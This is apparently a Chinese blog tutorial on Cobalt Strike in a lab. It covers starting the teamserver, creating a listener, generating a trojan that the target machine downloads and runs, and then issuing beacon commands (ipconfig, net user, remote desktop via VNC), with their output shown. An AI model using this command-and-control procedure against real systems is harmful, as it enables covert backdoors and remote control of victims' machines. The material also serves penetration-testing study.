【网络安全】CobaltStrike 使用

news2025/1/11 2:27:01

本文章仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。

Cobalt Strike是一款渗透测试神器,Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,主要是为了方便一个渗透团队内部能够及时共享所有成员的渗透信息,加强成员间的交流协作,提高渗透效率,可被团队进行分布式协团操作。Cobalt Strike是一款以metasploit为基础的GUI的框框架式渗透工具,Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。

环境准备:

名称系统位数IP
CS 服务端 / 客户端Kali Linux6410.3.0.231
靶机Windows 76410.3.0.234
一、安装服务端 

1、下载

https://download.csdn.net/download/mshxuyi/89004757

2、安装

# 解压
unzip cobaltstrike4.3.zip

# 切换安装目录
cd /opt/cobaltstrike4.3

# 修改权限
chmod 777 teamserver

 3、 运行

nohup ./teamserver 10.3.0.231 admin@123 > logs.info 2>&1 &

4、查看,CS服务是50050端口

└─# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      661/sshd: /usr/sbin 
tcp6       0      0 :::3389                 :::*                    LISTEN      659/xrdp            
tcp6       0      0 ::1:3350                :::*                    LISTEN      620/xrdp-sesman     
tcp6       0      0 :::50050                :::*                    LISTEN      3770309/java        
tcp6       0      0 :::80                   :::*                    LISTEN      3770309/java        
tcp6       0      0 :::22                   :::*                    LISTEN      661/sshd: /usr/sbin
二、运行客户端

1、本例还是在 Kali 中运行,注意因为要打开界面,所以在SSH下面不行,我们可以远程桌面到Kail,然后再运行

2、切换到 CS 目录,运行

sh start.sh

3、弹出连接界面,输入上面设置的密码 admin@123

三、创建监听器 

1、创建监听器  

2、点击最下面 Add

四、创建木马 

1、创建攻击木马

2、选择上面创建的监听器

3、保存木马文件

4、创建木马链接

5、选择木马位置与生成的文件名

6、把生成的木马链接在 靶机上面运行 

五、靶机运行木马 

1、靶机下载木马并运行

六、CS服务端查看靶机上线 

1、可以看到靶机已经上线了

2、进入靶机

3、成功出现命令行

4、查看靶机IP和用户

beacon> shell ipconfig

# 输出
[*] Tasked beacon to run: ipconfig
[+] host called home, sent: 39 bytes
[+] received output:

Windows IP 配置


以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::8c47:ccd9:f10f:1b8b%11
   IPv4 地址 . . . . . . . . . . . . : 10.3.0.234
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.3.0.1

隧道适配器 isatap.{28F326C2-E31B-42B2-B03F-F2E07F5FAD84}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :



beacon> net user

# 输出
[*] Tasked beacon to run net user on localhost
[+] host called home, sent: 105073 bytes
[+] received output:
Users for \\localhost:

Administrator (admin)
Guest
tomma

5、查看靶机桌面

beacon> desktop

# 输出
[+] host called home, sent: 16 bytes
[*] Tasked beacon to spawn VNC server
[+] host called home, sent: 374794 bytes
[+] started port forward on 7146 to 127.0.0.1:7146

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1535384.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

如何避免OKR成为形式主义,真正发挥其作用?

如何避免OKR成为形式主义,真正发挥其作用?

OKR(Objectives and Key Results)作为一种目标管理方法,旨在通过设定明确的目标和可衡量的关键成果,帮助企业实现高效、精准的管理。然而,在实际应用中,许多企业却陷入了形式主义的泥潭,使OKR失…
阅读更多...
1.什么是exchange的自签名证书?安装exchange后,默认生成的证书介绍?如何查看exchange的证书情况?命令是?

1.什么是exchange的自签名证书?安装exchange后,默认生成的证书介绍?如何查看exchange的证书情况?命令是?

目录 1.exchange的自签名证介绍 2.如何查看exchange的证书? 3.默认生成证书介绍 第一张:Microsoft Exchange 第二张:Microsoft Exchange Server Auth Certificate 第三张:WMSVC 总结: 1.exchange的自签名证介绍…
阅读更多...
JAVA 获取系统当前时间、时间格式互相转化工具类,2024百度Java岗面试真题收录解析

JAVA 获取系统当前时间、时间格式互相转化工具类,2024百度Java岗面试真题收录解析

DateTimeFormatter ftf DateTimeFormatter.ofPattern(“yyyy-MM-dd HH:mm:ss”); LocalDateTime parse LocalDateTime.parse(strTime, ftf); return LocalDateTime.from(parse).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(); } //通过LocalDateTime获取当…
阅读更多...
CPP容器vector和list,priority_queue定义比较器

CPP容器vector和list,priority_queue定义比较器

#include <iostream> #include <bits/stdc.h> using namespace std; struct VecCmp{bool operator()(int& a,int& b){return a>b;/*** 对于vector和list容器&#xff0c;这里写了&#xff1e;就是从大到小* 对于priority_queue容器&#xff0c;这里写…
阅读更多...
YOLO改进模块出现的问题及改进方法

YOLO改进模块出现的问题及改进方法

1.grid_sampler_2d_backward_cuda 在对YOLOv9进行改进的过程中&#xff0c;有的时候就会出现这种报错&#xff1a;RuntimeError: grid_sampler_2d_backward_cuda does not have a deterministic implementation&#xff0c;but you set torch.use_deterministic_algorithms(Tr…
阅读更多...
【SpringSecurity】十七、OAuth2授权服务器 + 资源服务器Demo

【SpringSecurity】十七、OAuth2授权服务器 + 资源服务器Demo

文章目录 0、库表准备1、项目结构2、基于数据库的认证3、授权服务器配置4、授权服务器效果测试5、资源服务器配置6、其他授权模式测试6.1 密码模式6.2 简化模式6.3 客户端模式6.4 refresh_token模式 相关&#x1f4d5;&#xff1a;【Spring Security Oauth2 配置理论部分】 0、…
阅读更多...
[C#]winformYOLO区域检测任意形状区域绘制射线算法实现

[C#]winformYOLO区域检测任意形状区域绘制射线算法实现

【简单介绍】 Winform OpenCVSharp YOLO区域检测与任意形状区域射线绘制算法实现 在现代安全监控系统中&#xff0c;区域检测是一项至关重要的功能。通过使用Winform结合OpenCVSharp库&#xff0c;并结合YOLO&#xff08;You Only Look Once&#xff09;算法&#xff0c;我们…
阅读更多...
Docker之docker compose!!!!

Docker之docker compose!!!!

一、概述 是 Docker 官方提供的一款开源工具&#xff0c;主要用于简化在单个主机上定义和运行多容器 Docker 应用的过程。它的核心作用是容器编排&#xff0c;使得开发者能够在一个统一的环境中以声明式的方式管理多容器应用的服务及其依赖关系。 也就是说Docker Compose是一个…
阅读更多...
利用Jmeter工具对服务器,数据库进行性能监控,压测,导出性能测试报告

利用Jmeter工具对服务器,数据库进行性能监控,压测,导出性能测试报告

Jmeter是Apache基金会旗下的一款免费,开源,轻量级的性能测试工具,主要针对web应用程序客户端/服务器进行性能测试.它可以分别测试静态、动态资源(Java Servlet,CGI Scripts,Java Object,数据库和FTP服务器等),它可以通过线程组来模拟数个用户,在一段时间内同时登录服务器,数个用…
阅读更多...
MySQL的基础操作与管理

MySQL的基础操作与管理

一.MySQL数据库基本操作知识&#xff1a; 1.SQL语句&#xff1a; 关系型数据库&#xff0c;都是使用SQL语句来管理数据库中的数据。 SQL&#xff0c;即结构化查询语言(Structured Query Language) 。 SQL语句用于维护管理数据库&#xff0c;包括数据查询、数据更新、访问控…
阅读更多...
【机器学习】基于蝴蝶算法优化的BP神经网络分类预测(BOA-BP)

【机器学习】基于蝴蝶算法优化的BP神经网络分类预测(BOA-BP)

目录 1.原理与思路2.设计与实现3.结果预测4.代码获取 1.原理与思路 【智能算法应用】智能算法优化BP神经网络思路【智能算法】蝴蝶优化算法&#xff08;BOA)原理及实现 2.设计与实现 数据集&#xff1a; 数据集样本总数2000 多输入多输出&#xff1a;样本特征24&#xff0c…
阅读更多...
WAF是什么意思?waf防火墙部署方式

WAF是什么意思?waf防火墙部署方式

防火墙中的WAF是什么意思&#xff1f;WAF是Web Application Firewall的简称&#xff0c;即Web应用防火墙&#xff08;也称网站应用级入侵防御系统&#xff09;一种专门为Web应用提供保护的网络安全设备&#xff0c;工作在应用层&#xff0c;通过执行一系列针对HTTP/HTTPS的安全…
阅读更多...
GraalVM详细安装及打包springboot、java、javafx使用教程(打包普通JAVA项目篇)

GraalVM详细安装及打包springboot、java、javafx使用教程(打包普通JAVA项目篇)

前言 在当前多元化开发环境下&#xff0c;Java作为一种广泛应用的编程语言&#xff0c;其应用部署效率与灵活性的重要性日益凸显。Spring Boot框架以其简洁的配置和强大的功能深受开发者喜爱&#xff0c;而JavaFX则为开发者提供了构建丰富桌面客户端应用的能力。然而&#xff…
阅读更多...
硬盘、内存、缓存(CPU)和寄存器 空间大小与存取速度的区别及设计原理

硬盘、内存、缓存(CPU)和寄存器 空间大小与存取速度的区别及设计原理

一、寄存器和存储器是不同的 很多人会将 寄存器 与 存储器 二者混淆&#xff0c;认为它们是同一个东西。但并不是&#xff01;&#xff01; 寄存器是CPU上的一个模块 存储器是 内存硬盘的统称 二、存取速度的比较 CPU(包含寄存器&#xff0c;缓存) > 内存 > 硬盘 内…
阅读更多...
Monoxer Programming Contest 2024(AtCoder Beginner Contest 345)(A,B,C,D,E,F)

Monoxer Programming Contest 2024(AtCoder Beginner Contest 345)(A,B,C,D,E,F)

比赛链接 这场。。。好像已经是一周之前的比赛来着&#xff0c;终于补完了。 C是个披着字符串外衣的数学容斥题。D是个超级超级暴力的爆搜&#xff0c;写起来超级麻烦&#xff0c;感觉。。。真是一次酣畅淋漓的赤石。E是个DP&#xff0c;朴素想法其实比较直观&#xff0c;不过…
阅读更多...
C# 右键快捷菜单(上下文菜单)的两种实现方式

C# 右键快捷菜单(上下文菜单)的两种实现方式

在C#中&#xff0c;ContextMenuStrip是一种用于创建右键菜单的控件。它提供了一种方便的方式来为特定的控件或窗体添加自定义的上下文菜单选项。有两种实现方式&#xff0c;如下&#xff1a; 一.通过ContextMenuStrip控件实现 1.从工具箱中拖一个ContextMenuStrip控件到窗体上…
阅读更多...
银行量子金融系统应用架构设计

银行量子金融系统应用架构设计

量子金融&#xff08;即Financial-Quantum&#xff0c;简称Fin-Q&#xff09;&#xff0c;特指量子科技在金融行业中的应用。 目前&#xff0c;量子科技中以量子保密通信、量子随机数和量子计算发展进度较快&#xff0c;取得了诸多阶段性重大技术突破和商用成果&#xff0c;这…
阅读更多...
vue学习日记13:记账清单,渲染添加删除

vue学习日记13:记账清单,渲染添加删除

一.需求说明 二、实践 1.基本渲染 &#xff08;1&#xff09;代码 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8" /><meta name"viewport" content"widthdevice-width, initial-scale1.0" …
阅读更多...
JAVA安全(偏基础)

JAVA安全(偏基础)

SQL注入 SQLI(SQL Injection)&#xff0c; SQL注入是因为程序未能正确对用户的输入进行检查&#xff0c;将用户的输入以拼接的方式带入SQL语句&#xff0c;导致了SQL注入的产生。攻击者可通过SQL注入直接获取数据库信息&#xff0c;造成信息泄漏。 JDBC JDBC有两个方法获取s…
阅读更多...
实时数仓之实时数仓架构(Doris)

实时数仓之实时数仓架构(Doris)

目前比较流行的实时数仓架构有两类,其中一类是以Flink+Doris为核心的实时数仓架构方案;另一类是以湖仓一体架构为核心的实时数仓架构方案。本文针对Flink+Doris架构进行介绍,这套架构的特点是组件涉及相对较少,架构简单,实时性更高,且易于Lambda架构实现,Doris本身可以支…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023